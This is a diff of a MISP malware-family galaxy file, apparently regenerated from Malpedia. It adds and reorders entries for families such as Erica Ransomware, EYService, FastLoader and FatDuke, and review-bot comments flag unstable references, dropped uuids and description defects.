 "synonyms": [
 "Geodo",
@@ -7604,7 +14704,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader",
- "https://twitter.com/thor_scanner/status/992036762515050496"
+ "https://paper.seebug.org/1301/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://twitter.com/thor_scanner/status/992036762515050496",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
 ],
 "synonyms": [],
 "type": []
@@ -7612,14 +14725,30 @@
 "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b",
 "value": "Empire Downloader"
 },
+ {
+ "description": "Supposedly a worm that was active around 2012-2013.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emudbot",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_emudbot.jp"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d3189268-443b-42f6-99a2-12d29f309c0b",
+ "value": "Emudbot"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal",
- "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf",
- "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
- "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/"
 ],
 "synonyms": [
 "Lurid"
@@ -7629,13 +14758,26 @@
 "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9",
 "value": "Enfal"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enviserv",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Enviserv.A"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "58071588-708d-447d-9fb4-8c9268142c82",
+ "value": "Enviserv"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug",
 "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/",
- "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf",
+ "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ",
 "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
 "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html"
 ],
@@ -7684,7 +14826,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel",
- "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab"
+ "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:https://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab"
 ],
 "synonyms": [],
 "type": []
@@ -7692,6 +14834,47 @@
 "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab",
 "value": "Eredel"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erica_ransomware",
+ "https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0f4731b3-b661-4677-9e51-474504313202",
+ "value": "Erica Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eris",
+ "https://lekstu.ga/posts/go-under-the-hood-eris/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c4531af6-ab25-4266-af41-e01635a93abe",
+ "value": "Eris Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks",
+ "https://github.com/stamparm/EternalRocks"
+ ],
+ "synonyms": [
+ "MicroBotMassiveNet"
+ ],
+ "type": []
+ },
+ "uuid": "10dd9c6a-9baa-40b6-984a-0598c4d9a88f",
+ "value": "EternalRocks"
+ },
 {
 "description": "",
 "meta": {
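Review bot: The only analysis reference for the new Erica Ransomware entry is a personal Dropbox share, `https://www.dropbox.com/s/f4uulu2rhyj4leb/Girl.scr_malware_report.pdf?dl=0`, which can be removed or replaced by its owner without notice and so gives consumers of the galaxy no stable citation. The Egregor and Enfal entries in this same commit already use `https://web.archive.org/web/...` snapshots for volatile sources; the same treatment would suit this PDF, and since the cluster is regenerated from Malpedia the archived link should be added in the upstream entry. The neighbouring Eris Ransomware entry rests on a single personal blog post and is worth the same consideration if a snapshot exists.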
@@ -7701,27 +14884,38 @@ "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", - 
"https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://gvnshtn.com/maersk-me-notpetya/", + "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://securelist.com/schroedingers-petya/78870/", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", 
"https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", @@ -7729,9 +14923,10 @@ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://securelist.com/bad-rabbit-ransomware/82851/" + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://www.riskiq.com/blog/labs/badrabbit/" ], "synonyms": [ "BadRabbit", @@ -7754,8 +14949,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", + "https://www.secureworks.com/research/threat-profiles/bronze-globe", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ 
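Review bot: In the NotPetya hunk (L336–L338) several references are removed and re-added rather than changed — `https://www.riskiq.com/blog/labs/badrabbit/` and `http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html` both appear as `-` lines and again as `+` lines — so most of the diff is ordering churn from upstream, not content. The FastPOS hunk on L345 and the FlokiBot hunk on L352 show the same pattern. If the generator sorted each `refs` array before writing, future updates would show only real additions and removals, and the genuine removals here (the labsblog.f-secure.com entries) would be easy to review.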
@@ -7771,7 +14966,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", - "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [], @@ -7785,7 +14981,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" ], "synonyms": [ "Vidgrab" @@ -7800,8 +14998,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", - "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", - "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] 
@@ -7814,8 +15013,6 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony",
- "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/",
- "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware",
 "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/"
 ],
 "synonyms": [
@@ -7839,6 +15036,23 @@
 "uuid": "af3a3ece-e67f-457a-be72-7651bc720342",
 "value": "Evrial"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "https://www.wired.com/story/sandworm-centreon-russia-hack/",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dd68abd7-b20a-40a5-be53-ae8d45c1dd27",
+ "value": "Exaramel (Windows)"
+ },
 {
 "description": "",
 "meta": {
@@ -7882,15 +15096,33 @@ "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b", "value": "Exile RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", + "https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d742986c-04f0-48ef-aaa3-10eeb0e95be4", + "value": "Exorcist Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html" + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://blogs.360.cn/post/APT-C-44.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://citizenlab.ca/2015/12/packrat-report/", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], "synonyms": [ "ExtRat" 
@@ -7915,28 +15147,27 @@
 "value": "Eye Pyramid"
 },
 {
- "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).",
+ "description": "EYService is the main part of the backdoor used by Nazar APT. This a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap. ",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga",
- "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
- "https://github.com/360netlab/DGA/issues/36",
- "http://www.freebuf.com/column/153424.html"
- ],
- "synonyms": [
- "WillExec"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice",
+ "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://blog.malwarelab.pl/posts/nazar_eyservice/",
+ "https://www.epicturla.com/blog/the-lost-nazar",
+ "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/"
 ],
+ "synonyms": [],
 "type": []
 },
- "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789",
- "value": "FakeDGA"
+ "uuid": "9b287426-e82f-407e-8d12-42dac4241bf8",
+ "value": "EYService"
 },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean",
- "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/",
 "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/",
 "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf",
 "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv"
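Review bot: The FakeDGA cluster (uuid `31c248cb-51b5-4bb7-801f-d8520d2b5789`, synonym `WillExec`, and its description) disappears from the file and the EYService entry takes its slot under a new uuid, with nothing recording the removal. MISP instances tag events with galaxy cluster uuids, so silently dropping a uuid breaks existing tags and correlations on every instance that synced the previous version; the misp-galaxy convention is to keep the old value with `"revoked": true` (optionally pointing at a successor via `related`) rather than delete it. The FF RAT entry (uuid `e701b875-8ade-434f-89ff-6c367099bfd8`), replaced by Ficker Stealer in the hunk on L347, has the same problem, and since an FF RAT reference is added under FormerFirstRAT in the hunk on L356, a `related` link from the revoked entry to `9aacd2c7-bcd6-4a82-8250-cab2e4e2d402` would preserve that merge history. Minor: the new description reads `This a passive backdoor` (missing `is`) and ends with a trailing space.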
@@ -7954,7 +15185,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/", + "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" ], "synonyms": [], "type": [] @@ -7966,12 +15198,45 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/" ], "synonyms": [], "type": [] }, + "uuid": "6eb3546c-cb8b-447c-81d1-9c4c1166581d", + "value": "FakeWord" + }, + { + "description": "FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter", + "https://www.epicturla.com/previous-works/hitb2020-voltron-sta" + ], + "synonyms": [ + "0xFancyFilter" + ], + "type": [] + }, + "uuid": "e7d06257-2bc6-45b6-8728-080df9932f90", + "value": "fancyfilter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", + "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1", + "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/" + ], + "synonyms": [ + "DEMENTIAWHEEL" + ], + "type": [] + }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", "value": "Fanny" }, 
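Review bot: The new cluster's `value` is `fancyfilter` while every other value in the file is capitalised (`FakeWord`, `Fanny`) and its own synonym is `0xFancyFilter`; `value` is the display name and the tag text in MISP, so `"value": "FancyFilter"` would match the convention. Its description, `FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.`, describes the cited talk rather than the component itself and ends with a trailing space; if upstream has no better text, an empty description (as FakeWord uses) is less misleading than one that reads as a note about the reference.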
@@ -7993,7 +15258,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer",
- "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/"
+ "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/",
+ "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/"
 ],
 "synonyms": [],
 "type": []
@@ -8001,14 +15268,29 @@
 "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602",
 "value": "Farseer"
 },
+ {
+ "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "21b86dbb-d000-449c-bfe4-41faede4bd89",
+ "value": "FastLoader"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/",
+ "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/",
- "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf",
- "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf"
+ "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf",
+ "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf"
 ],
 "synonyms": [],
 "type": []
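Review bot: The FastLoader entry lists `https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader` twice in `refs`, so the cluster ends up with no external reference at all, and its description ends with ` \r\n`, which renders as a stray blank line in the MISP UI. Dropping the duplicate and the trailing whitespace is a one-line fix each. A duplicate check on `refs` in the generator would catch this class of defect; the Freenki entry in the hunk on L356 carries an http/https pair of the same Talos URL (`http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` and its `https://` twin).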
@@ -8016,6 +15298,33 @@ "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, + { + "description": "According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4325c84b-9a9b-4e7c-977f-20d7ae817b7e", + "value": "FatDuke" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct", + "https://id-ransomware.blogspot.com/2020/02/fct-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd", + "value": "FCT Ransomware" + }, { "description": "", "meta": { 
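Review bot: The FatDuke description is lifted from the ESET report in the first person (`hence our name for this backdoor component`, `ESET have seen`) while opening with `According to ESET Research`, and there is a missing space in `PsExec.The operators`. Galaxy descriptions are shown as the cluster's own text, so either mark it as a quotation (`ESET Research describes FatDuke as ...`) or rephrase in the third person; a two-sentence summary that leaves the details to the cited report would be enough.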
@@ -8052,6 +15361,7 @@
 "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
 "https://feodotracker.abuse.ch/",
 "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
+ "https://en.wikipedia.org/wiki/Maksim_Yakubets",
 "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html"
 ],
 "synonyms": [
@@ -8067,14 +15377,15 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat",
- "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "https://twitter.com/3xp0rtblog/status/1321209656774135810"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8",
- "value": "FF RAT"
+ "uuid": "6ad46852-24f3-4415-a4ab-57a52cd8a1cb",
+ "value": "Ficker Stealer"
 },
 {
 "description": "",
@@ -8089,6 +15400,20 @@
 "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933",
 "value": "FileIce"
 },
+ {
+ "description": "Filerase is a .net API-based utility capable of propagating and recursively deleting files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e5fbb536-4994-4bd5-b151-6d5e41ed9f5b",
+ "value": "Filerase"
+ },
 {
 "description": "",
 "meta": {
@@ -8119,17 +15444,22 @@ "value": "FindPOS" }, { - "description": "", + "description": "FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", - "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", + "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", 